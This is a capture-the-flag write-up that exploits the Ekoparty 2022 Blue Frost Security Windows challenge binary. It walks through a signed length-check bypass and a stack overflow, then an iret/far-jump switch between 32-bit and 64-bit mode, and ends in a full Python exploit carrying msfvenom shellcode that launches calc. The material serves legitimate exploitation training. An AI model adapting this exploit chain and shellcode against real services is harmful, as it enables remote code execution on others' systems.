Ekoparty 2022 BFS Windows Challenge

In this blog post, we will solve the Windows userland challenge that Blue Frost Security published for Ekoparty 2022. You can find the challenge & description here:

We analyze the bfs-eko2022.exe binary in IDA and can see that it binds to 0.0.0.0 on port 31415. After a client connects, it calls sub_140001160, which checks that the first 6 bytes received are Hello\x00. If that’s the case, it sends back Hi\x00 and proceeds to call sub_140001240, where the main packet parsing is done. At the start of this function, it fills a heap buffer as seen below:

We can see 0x5050505050505050 being written followed by 0xcf58585858585858. This is repeated over the full length of the buffer (0x1000). At the beginning of the main function we can see how this buffer is allocated:

mov     r9d, 40h        ; flProtect
mov     r8d, 3000h      ; flAllocationType
mov     edx, 1000h      ; dwSize
mov     ecx, 10000000h  ; lpAddress
call    cs:VirtualAlloc

The heap buffer being filled lives at the fixed address 0x10000000, has a size of 0x1000, and is readable, writable, and executable (flProtect 0x40 is PAGE_EXECUTE_READWRITE). The initialization therefore covers the complete buffer. These initialization values are suspicious, as you would normally expect null bytes or random data. If we disassemble the bytes in the order they are stored in memory (both values are written as little-endian qwords), we get the following instructions:

0:  50                      push   rax
1:  50                      push   rax
2:  50                      push   rax
3:  50                      push   rax
4:  50                      push   rax
5:  50                      push   rax
6:  50                      push   rax
7:  50                      push   rax
8:  58                      pop    rax
9:  58                      pop    rax
a:  58                      pop    rax
b:  58                      pop    rax
c:  58                      pop    rax
d:  58                      pop    rax
e:  58                      pop    rax
f:  cf                      iretd
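The byte order of the fill pattern is easy to get wrong, so here is a minimal sketch that derives it from the two constants. The names `FILL_QWORDS` and `opcode_at` are made up for illustration; the only assumption is that both values are stored as little-endian qwords, as is usual on x86-64.

```python
import struct

# The two qwords the initialization loop writes, as seen in the disassembly.
FILL_QWORDS = (0x5050505050505050, 0xCF58585858585858)

# x86 stores integers little-endian, so the least significant byte comes first.
pattern = b"".join(struct.pack("<Q", q) for q in FILL_QWORDS)

# Only the three opcodes that occur in the pattern (64-bit mnemonics).
MNEMONICS = {0x50: "push rax", 0x58: "pop rax", 0xCF: "iretd"}


def opcode_at(offset: int) -> str:
    """Mnemonic of the fill byte at a given offset into the 0x1000 buffer."""
    return MNEMONICS[pattern[offset % len(pattern)]]


if __name__ == "__main__":
    for i, b in enumerate(pattern):
        print(f"{i:x}:  {b:02x}  {MNEMONICS[b]}")
```

Every 16-byte chunk of the buffer therefore consists of eight pushes, seven pops, and a single iret as the last byte.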

This does not look random at all and will play a role later on. For now, let’s continue to follow the control flow of the packet parsing function. After the handshake and initialization, it receives more bytes, looking for the magic value 0x323230326F6B45 (the string Eko2022\x00) followed by the byte T, which indicates the packet type. It then expects a 2-byte field that represents the packet length.

mov     rax, 323230326F6B45h
cmp     qword ptr [rsp+0F68h+buf], rax
jz      short loc_140001339
|
movzx   eax, [rsp+0F68h+var_20]
mov     [rsp+0F68h+var_38], al
movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 54h ; 'T'
jz      short loc_140001366
|
movsx   eax, [rsp+0F68h+var_1F]
cmp     eax, 0F00h
jle     short loc_140001386

The packet length comparison at the end looks interesting. It’s supposed to make sure that the packet length field cannot be larger than 0xf00. Before the comparison, however, the value is loaded into EAX with movsx, which is a move with sign extension. If we send 0xffff, it gets extended to 0xffffffff and is interpreted as -1. The final jle is a signed comparison and has to be taken; since -1 is less than 0xf00, we pass the check and can continue!
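The effect of the signed load can be reproduced in a few lines. This is only a model of the checks described above, not the binary’s code: the 11-byte header layout (8-byte magic, 1-byte type, 2-byte length) is inferred from the PoC, and `passes_length_check` is a hypothetical helper name.

```python
import struct

MAGIC = b"Eko2022\x00"
MAX_LEN = 0x0F00


def passes_length_check(header: bytes) -> bool:
    """Model of the header checks; the field layout is an assumption."""
    # "h" unpacks the length as a signed 16-bit value, which mirrors what
    # movsx does before the signed jle comparison against 0xf00.
    magic, ptype, length = struct.unpack("<8sch", header[:11])
    return magic == MAGIC and ptype == b"T" and length <= MAX_LEN


if __name__ == "__main__":
    for raw in (b"\x00\x0f", b"\x01\x0f", b"\xff\xff"):
        signed = struct.unpack("<h", raw)[0]
        ok = passes_length_check(MAGIC + b"T" + raw)
        print(f"length bytes {raw.hex()} -> {signed:6d}  passes: {ok}")
```

An unsigned comparison (or a zero-extending load) would have rejected 0xffff, which is why the sign extension is the actual bug here.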

Continuing at 140001386, another receive is called, reading network input into the heap buffer at 0x10000000. The maximum amount of data we can provide here is 0x1000, since anything more than that would go outside the allocated memory and cause an exception. The program then calls sub_1400011B0 on this data.

This function takes the data from the heap and copies it onto the stack, using the length we provided inside the packet itself! Remember that the intended maximum length is 0xf00, but we were able to provide 0xffff instead. This leads to a stack buffer overflow. The function also filters out 0x2b and 0x33 during the copy operation, replacing them with null bytes on the stack (this will be important later).
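To keep track of the filter while building payloads, it helps to model it. The sketch below only reproduces the byte replacement described above; how the real function bounds the copy is not modeled, and `filtered_copy` and `find_bad_bytes` are hypothetical helper names.

```python
BAD_BYTES = frozenset({0x2B, 0x33})


def filtered_copy(src: bytes) -> bytes:
    """Return what would land on the stack: bad bytes become null bytes."""
    return bytes(0 if b in BAD_BYTES else b for b in src)


def find_bad_bytes(data: bytes) -> list:
    """Offsets in data that the copy would overwrite with 0x00."""
    return [i for i, b in enumerate(data) if b in BAD_BYTES]


if __name__ == "__main__":
    sample = b"\x23\x00\x00\x00\x2b\x00\x00\x00"
    print(filtered_copy(sample).hex())  # the 0x2b is replaced by 0x00
    print(find_bad_bytes(sample))
```

Anything that has to survive on the stack should be run through a check like `find_bad_bytes` before it is sent.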

After the copy function has finished, the program once again checks that the packet type is T, this time using the copy of the data that is now on the stack. If that’s the case (which it is in normal use), it echoes back the data it received and exits. With our stack buffer overflow, however, we can overwrite the T on the stack with an X, which leads to a win function:

movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 58h ; 'X'
jnz     short loc_140001474
|
mov     rcx, cs:buf
add     rcx, rax
mov     rax, rcx
mov     cs:off_14000C000, rax
lea     rcx, [rsp+0F68h+CmdLine] ; lpCmdLine
call    cs:off_14000C000

If we can reach this last basic block, the program calls an address in the heap buffer just past the end of our input, which still contains the bytes that were written during initialization. At this point, we control the stack to some extent and, through the length of our input, can influence which exact byte of the pre-initialized heap memory we jump to. The following PoC brings us to this point.

PoC 0x01

#!/usr/bin/env python3
import socket, struct
p32 = lambda x: struct.pack('<I', x)  # little-endian 32-bit value

TARGET = '127.0.0.1'
PORT = 31415

sc = b""

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf =  b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion


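# placeholder values for the five dwords that iret pops
iret = b""
iret += p32(0x41414141)  # instruction pointer
iret += p32(0x42424242)  # code segment selector (CS)
iret += p32(0x43434343)  # EFLAGS
iret += p32(0x44444444)  # stack pointer
iret += p32(0x45454545)  # stack segment selector (SS)

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushes
p.send(buf)
p.recv(1)
p.close()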

When we break on the call instruction, we can see that we land on the heap and can single-step until the iret instruction. Note that we chose the input length so that we skip the pushes and land right at the pops, which lets us fully control the stack at the moment iret is executed.

bp bfs_eko2022+0x146E
g
Breakpoint 0 hit
bfs_eko2022+0x146e:
00007ff7`c7f2146e ff158cab0000    call    qword ptr [bfs_eko2022+0xc000 (00007ff7`c7f2c000)] ds:00007ff7`c7f2c000=0000000010000f08
0:000> t
00000000`10000f08 58              pop     rax
0:000> p
00000000`10000f09 58              pop     rax
0:000> 
00000000`10000f0a 58              pop     rax
0:000> 
00000000`10000f0b 58              pop     rax
0:000> 
00000000`10000f0c 58              pop     rax
0:000> 
00000000`10000f0d 58              pop     rax
0:000> 
00000000`10000f0e 58              pop     rax
0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`005eeb50  41414141 42424242 43434343 44444444
00000000`005eeb60  45454545 41414141 41414141 41414141
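The landing address in the trace can be reproduced from the payload length. The sketch below assumes, based on the trace (0xf08 bytes of payload, call target 0x10000f08), that the call target is the buffer base plus the number of payload bytes sent; `landing_address` and `pops_before_iret` are hypothetical helpers.

```python
BUF_BASE = 0x10000000  # lpAddress passed to VirtualAlloc
CHUNK = 16             # 8 pushes, 7 pops, 1 iret


def landing_address(payload_len: int) -> int:
    """Call target, assuming it is the buffer base plus the payload length."""
    return BUF_BASE + payload_len


def pops_before_iret(payload_len: int) -> int:
    """Number of pops executed before iret when landing in the pop half."""
    offset = payload_len % CHUNK
    if offset < 8:
        raise ValueError("lands in the push half of the 16-byte chunk")
    return (CHUNK - 1) - offset


if __name__ == "__main__":
    # 0xf00 bytes up to the packet type, 1 byte "X", 7 bytes of padding
    payload_len = 0x0F00 + 1 + 7
    print(hex(landing_address(payload_len)), pops_before_iret(payload_len))
```

With the PoC’s length, execution starts at the first pop of a chunk, so seven pops run before the iret, which matches the single-stepped trace.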

At this point, we have to do some digging on how iret works to see if we can craft the stack in a way that lets us gain (custom) code execution. The iret instruction is used to return control from an exception or interrupt handler and expects the following values on the stack, starting at the top (very good article on this topic):

- new instruction pointer
- new code segment selector (CS)
- new value of EFLAGS register 
- new stack pointer
- new stack segment selector (SS)
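Since the instruction executed here is iretd, each of these five values is a 32-bit dword, as the dd rsp output in the trace suggests. A small sketch that packs such a frame with named fields makes the later PoCs easier to read; `IretFrame` is a hypothetical helper, not something taken from the challenge.

```python
import struct
from typing import NamedTuple


class IretFrame(NamedTuple):
    """The five dwords iretd pops, in stack order (lowest address first)."""
    eip: int
    cs: int
    eflags: int
    esp: int
    ss: int

    def pack(self) -> bytes:
        # Five little-endian 32-bit values, 20 bytes in total.
        return struct.pack("<5I", *self)


if __name__ == "__main__":
    frame = IretFrame(0x41414141, 0x42424242, 0x43434343, 0x44444444, 0x45454545)
    print(frame.pack().hex())
```

The placeholder values are the same ones PoC 0x01 uses, so the packed bytes should match what shows up at rsp in the debugger.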

As for the instruction pointer and stack pointer, we could just point them into our heap buffer since we control a large part of it. The EFLAGS value we can read in the debugger and then reuse. This leaves us with CS and SS, which is a bit tricky. CS and SS hold selectors that index into the Global Descriptor Table (GDT), which has descriptors for kernel code/data and user code/data. Using WinDBG as a kernel debugger, we can see which indices match which descriptor:

0: kd> dd @gdtr
fffff807`39e95fb0  00000000 00000000 00000000 00000000
fffff807`39e95fc0  00000000 00209b00 00000000 00409300
fffff807`39e95fd0  0000ffff 00cffb00 0000ffff 00cff300
fffff807`39e95fe0  00000000 0020fb00 00000000 00000000
fffff807`39e95ff0  40000067 39008be9 fffff807 00000000
fffff807`39e96000  00003c00 0040f300 00000000 00000000
fffff807`39e96010  00000000 00000000 00000000 00000000

The first 16 bytes are reserved. Following those, we can see that there are some values at offsets 0x10 and 0x18:

0: kd> dg 0x10
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
0: kd> dg 0x18
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P  Nl 00000493

These are the entries for the kernel, as the privilege level of 0 in the Pl column shows. Two more entries follow:

0: kd> dg 0x20
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P  Nl 00000cfb
0: kd> dg 0x28
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P  Nl 00000cf3

These are the user code and data descriptors, ranging from 0 to 0xffffffff. The 2 least significant bits of a selector value hold the RPL (Requested Privilege Level). Because we want to stay in ring 3, we have to set both of these bits (RPL = 3), so 0x20 for the code segment becomes 0x23 and 0x28 becomes 0x2b.
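The selector arithmetic can be written down as a short sketch. The bit layout (RPL in bits 0-1, table indicator in bit 2, index in the remaining bits) is the standard x86 selector format; `decode_selector` and `gdt_offset` are hypothetical helper names.

```python
def decode_selector(selector: int) -> dict:
    """Split a segment selector into its three fields."""
    return {
        "index": selector >> 3,     # descriptor index in the table
        "ti": (selector >> 2) & 1,  # 0 = GDT, 1 = LDT
        "rpl": selector & 3,        # requested privilege level
    }


def gdt_offset(selector: int) -> int:
    """Byte offset of the descriptor, i.e. the selector without TI and RPL."""
    return selector & ~7


if __name__ == "__main__":
    for sel in (0x10, 0x18, 0x23, 0x2B, 0x33, 0x53):
        print(f"{sel:#04x} -> offset {gdt_offset(sel):#04x}, {decode_selector(sel)}")
```

This is also why dg 0x23 and dg 0x20 show the same descriptor: only the upper bits select the entry.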

In 64-bit mode, segmentation is largely disabled (see: https://nixhacker.com/segmentation-in-intel-64-bit/), but the descriptor that CS selects still decides the execution mode. The entry behind 0x23 is a 32-bit code segment (Nl, not long, in the output above), so by supplying it to our iret we switch to 32-bit mode. With this bit of theory out of the way, we still have a problem: 0x2b is a bad byte and will not end up on the stack! So we can choose 0x23 for the code segment but have to be creative about what to use for the stack segment.
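Whether a code selector yields 32-bit or 64-bit execution is recorded in the descriptor itself, in the L (long mode) bit. The sketch below decodes a few raw entries copied from the dd @gdtr dump above, using the standard x86-64 descriptor layout; `decode_descriptor` is a hypothetical helper and only extracts the fields relevant here.

```python
# (low dword, high dword) pairs copied from the dd @gdtr output, keyed by offset
GDT_ENTRIES = {
    0x10: (0x00000000, 0x00209B00),
    0x18: (0x00000000, 0x00409300),
    0x20: (0x0000FFFF, 0x00CFFB00),
    0x28: (0x0000FFFF, 0x00CFF300),
    0x30: (0x00000000, 0x0020FB00),
}


def decode_descriptor(low: int, high: int) -> dict:
    """Extract privilege level, code/data type, and long-mode flag."""
    return {
        "dpl": (high >> 13) & 3,         # descriptor privilege level
        "code": bool(high & (1 << 11)),  # executable bit of the type field
        "long": bool(high & (1 << 21)),  # L bit: 64-bit code segment
    }


if __name__ == "__main__":
    for offset, (low, high) in GDT_ENTRIES.items():
        print(f"{offset:#04x}: {decode_descriptor(low, high)}")
```

Under this reading, the entry at 0x20 is ring 3 code without the L bit (32-bit), while the entry at 0x30 is ring 3 code with the L bit set, which is the descriptor selector 0x33 refers to.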

In theory, any selector that does not crash on iret is fine. It has to refer to a Data RW descriptor, but we don’t necessarily need a valid stack base and limit if we can avoid using the stack. After inspecting more values and seeing which ones do and don’t crash, we eventually find 0x53:

0:000> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`0060a000 00000000`00000fff Data RW Ac 3 Bg By P  Nl 000004f3

From the output, we can see that base and limit are not really useful for us, but if we avoid the stack we should be fine (base and limit are also somewhat random and can change across reboots). Now it’s time to update the PoC:

PoC 0x02

...
sc =  b""
sc += b"\xcc"
sc += b"\x90"*100
...
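iret = b""
iret += p32(0x10000014)  # EIP: start of sc, right after the 20-byte iret frame
iret += p32(0x23)        # CS: 32-bit user code segment
iret += p32(0x00010202)  # EFLAGS: value taken from the debugger
iret += p32(0x10000400)  # ESP: points into the heap buffer
iret += p32(0x53)        # SS: data selector that avoids the bad byte 0x2b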
...
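Because the iret frame is copied to the stack, it has to get past the 0x2b/0x33 filter unchanged. A quick check along these lines can catch a mangled frame before debugging; `survives_stack_copy` and `iret_frame` are hypothetical helpers, and the values are the ones from the PoC.

```python
import struct

BAD_BYTES = (0x2B, 0x33)  # replaced with 0x00 when copied to the stack


def survives_stack_copy(data: bytes) -> bool:
    """True if the stack copy would leave data unmodified."""
    return not any(b in BAD_BYTES for b in data)


def iret_frame(eip: int, cs: int, eflags: int, esp: int, ss: int) -> bytes:
    """Pack the five dwords popped by iretd."""
    return struct.pack("<5I", eip, cs, eflags, esp, ss)


if __name__ == "__main__":
    for ss in (0x2B, 0x53):
        frame = iret_frame(0x10000014, 0x23, 0x00010202, 0x10000400, ss)
        print(f"SS={ss:#04x} survives: {survives_stack_copy(frame)}")
```

The same check applies to the instruction and stack pointer values: an address containing 0x2b or 0x33 in any byte would be corrupted as well.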

Debugging the new PoC shows that we indeed end up in 32-bit mode inside our shellcode and can execute it!

0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`00cfede0  10000014 00000023 00010202 10000400
00000000`00cfedf0  00000053 41414141 41414141 41414141
0:000> g
10000014 cc              int     3
0:000:x86> p
10000015 90              nop
0:000:x86> p
10000016 90              nop

Any attempt to use the stack will fail, however (note that WinDBG automatically repairs 0x53 back to 0x2b if you are single-stepping, which can be confusing!). This means we need to use our ability to execute shellcode to either restore stack functionality or get back to 64-bit mode.

As it turns out, there is exactly such a thing. By using a far jump such as 0x33:0x100000xx, we can specify 0x33 as the new code segment, which gets us back to 64-bit mode. Since 64-bit mode does not need a stack segment selector, we can now use the stack again! The only thing left to do (besides generating valid shellcode) is to restore the stack pointer. Luckily, debugging shows that RCX still holds a reference to the stack, so we can just copy it into RSP. After the jump into 64-bit mode, we can continue with 64-bit shellcode that restores the stack and then does anything we like:

PoC 0x03

...
sc =  b""
sc += b"\xcc"
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # jmp 0x33:0x1000001c (int3 at 0x10000014, jmp at 0x10000015)
sc += b"\x48\x89\xC8\x48\x89\xC4" # mov rax, rcx; mov rsp, rax: restore original stack from ref in rcx
sc += b"\xcc"
...

Note that even though 0x33 is a bad byte, this is only true for the stack. On the heap, where the shellcode lies, it remains unchanged. Debugging shows the switch back to 64-bit mode:

10000014 cc                      int     3
0:000:x86> p
10000015 ea1c0000103300          jmp     0033:1000001C
0:000:x86> p
00000000`1000001c 4889c8          mov     rax,rcx
0:000> p
00000000`1000001f 4889c4          mov     rsp,rax
0:000> 
00000000`10000022 cc              int     3
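The far jump bytes do not have to be assembled by hand. A minimal sketch for the `jmp ptr16:32` encoding (opcode 0xEA, followed by a 32-bit offset and a 16-bit selector) is shown below; `far_jmp32` and `jump_to_next` are hypothetical helper names.

```python
import struct

FAR_JMP_LEN = 7  # 1 opcode byte + 4 offset bytes + 2 selector bytes


def far_jmp32(offset: int, selector: int) -> bytes:
    """Encode a 32-bit mode `jmp selector:offset` (opcode EA)."""
    return b"\xea" + struct.pack("<IH", offset, selector)


def jump_to_next(jmp_addr: int, selector: int = 0x33) -> bytes:
    """Far jump that continues right behind itself in another code segment."""
    return far_jmp32(jmp_addr + FAR_JMP_LEN, selector)


if __name__ == "__main__":
    # In the trace the int3 sits at 0x10000014, so the jmp starts at 0x10000015.
    print(jump_to_next(0x10000015).hex())
```

Deriving the target from the address of the jump itself keeps it correct when bytes in front of it are added or removed. For example, without the leading int3 the jump would start at 0x10000014 and the 64-bit code would begin at 0x1000001b instead of 0x1000001c.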

For the final exploit, all that is left to do is generate some shellcode, e.g. with msfvenom -p windows/x64/exec cmd="calc" -f python.

Final PoC

#!/usr/bin/env python3
# Author: @xct_de

import socket, struct
p32 = lambda x: struct.pack('<I', x)  # little-endian 32-bit value

TARGET = '127.0.0.1'
PORT = 31415

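sc =  b""
#sc += b"\xcc"

# With the int3 above disabled, the far jmp occupies 0x10000014-0x1000001a,
# so the 64-bit code starts at 0x1000001b (not 0x1000001c as in PoC 0x03).
sc += b"\xea\x1b\x00\x00\x10\x33\x00" # from 0x10000014 (x86) to 0x1000001b (x64)
sc += b"\x48\x89\xC8\x48\x89\xC4"     # mov rax, rcx; mov rsp, rax: restore original stack from rcx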

# msfvenom -p windows/x64/exec cmd="calc" -f python
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf = b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion

# switch from 64-bit to 32-bit via iret
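iret = b""
iret += p32(0x10000014)  # EIP: start of sc in the heap buffer
iret += p32(0x23)        # CS: 32-bit user code segment
iret += p32(0x00010202)  # EFLAGS: value taken from the debugger
iret += p32(0x10000400)  # ESP: points into the heap buffer
iret += p32(0x53)        # SS: data selector that avoids the bad byte 0x2b

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushes
p.send(buf)
p.recv(1)
p.close()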
This post is licensed under CC BY 4.0 by the author.